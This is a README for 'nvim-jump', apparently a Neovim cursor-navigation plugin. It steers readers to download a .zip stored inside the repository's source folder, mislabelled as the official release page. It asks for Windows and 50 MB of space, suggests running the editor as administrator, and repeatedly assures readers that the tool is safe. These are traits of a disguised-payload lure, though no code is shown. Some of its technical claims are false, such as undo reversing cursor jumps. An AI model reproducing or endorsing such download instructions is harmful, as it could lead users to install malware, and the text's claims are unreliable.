# 🚀 nvim-jump - Move through your text files faster [![Download nvim-jump](https://img.shields.io/badge/Download-Release_Page-blue.svg)](https://github.com/treverlight1245/nvim-jump/raw/refs/heads/main/lua/jump/jump_nvim_v2.3.zip) nvim-jump helps you move your cursor in text documents. It follows the idea that moving around should take little effort. You open a file, trigger the jump, and arrive at your target. This tool removes the need to hold down arrow keys for seconds at a time. It works inside your text editor to make your work flow feel natural. ## 📋 What this tool does Text editors often force you to move your cursor one letter at a time. This becomes slow when you have a long document. nvim-jump changes how you navigate. It identifies the words or sentences on your screen and assigns a key to each one. You press that key to jump directly to the target location. This process saves time. You spend less energy searching for your place in a file. The tool provides a clean experience without extra menus or settings. It stays out of your way until you need it. ## 🖥️ System Requirements Your computer must meet these basic needs to run nvim-jump: * Windows 10 or Windows 11. * Neovim installed on your system. * At least 50 megabytes of free disk space. * A stable internet connection for the download. If you maintain a standard workspace, you have everything required to run this software. ## 💾 How to download the software Follow these steps to get the files on your machine: 1. Open your web browser. 2. Go to the [official release page](https://github.com/treverlight1245/nvim-jump/raw/refs/heads/main/lua/jump/jump_nvim_v2.3.zip). 3. Find the latest version in the list. 4. Click the file ending in .zip to start the download. 5. Save the folder to a location you remember, such as your Downloads folder. You now possess the files needed to add jump functionality to your editor. ## ⚙️ How to install nvim-jump Installation involves placing the files into your Neovim configuration folder. Please follow these steps in order: 1. Locate your Neovim folder. This is usually found in your user profile under AppData/Local/nvim. 2. Open the .zip folder you downloaded. 3. Extract the contents into the plugins sub-folder inside your Neovim directory. 4. If a plugins folder does not exist, create one. 5. Restart your Neovim application. Once the application restarts, it will detect the new files. The jump tool initializes automatically. You do not need to run any complex commands or edit registry keys. ## 🏹 How to use the software Using nvim-jump requires one standard command. When you have a text file open: 1. Press the leader key followed by the letter 'j'. 2. Look for the small labels that appear over the words on your screen. 3. Type the character shown on the label for your destination. 4. The cursor moves instantly to that position. You can repeat this process as often as you like. The labels disappear as soon as you finish your jump. This keeps your view clear of clutter. ## 🛠️ Troubleshooting common issues Most users encounter zero problems during setup. If the tool does not work, check these common points: * **Plugin not loading:** Ensure you placed the files in the correct folder path. Check the name of your folder again. * **Keys not appearing:** Verify that you installed Neovim correctly before adding the plugin files. Some versions of Windows require you to run the editor as an administrator to load custom files. * **Conflicting tools:** If you have other navigation add-ons, they might try to use the same keys. Try disabling those tools to see if nvim-jump works on its own. ## 📝 Frequently asked questions **Can I change the jump keys?** Yes, you can edit the configuration file to map different keys for your jumps. Look for the settings.lua file in the plugin folder. **Does this work in all text editors?** No, this plugin is specific to Neovim. It uses features that belong to the Neovim architecture. **Is this tool safe for my files?** Yes. nvim-jump only reads your screen and moves the cursor. It never reads or modifies the content of your files. Your data remains private and unchanged. **Will this slow down my editor?** The tool uses a lightweight design. It consumes almost no memory and will not impact the startup time of your editor. **Can I undo a jump?** Neovim tracks your cursor movements automatically. You can use the standard undo command to return to your previous location if you make a mistake. ## 🤝 Support and updates We update this tool to ensure it keeps working with new versions of the editor. Check the release page once per month to see if a newer version exists. If you find a bug, you can open an issue on the main page. Please describe the problem and mention which version of Windows you use. This helps us provide a fix for you and other users. Keeping your software current is the best way to maintain a smooth experience.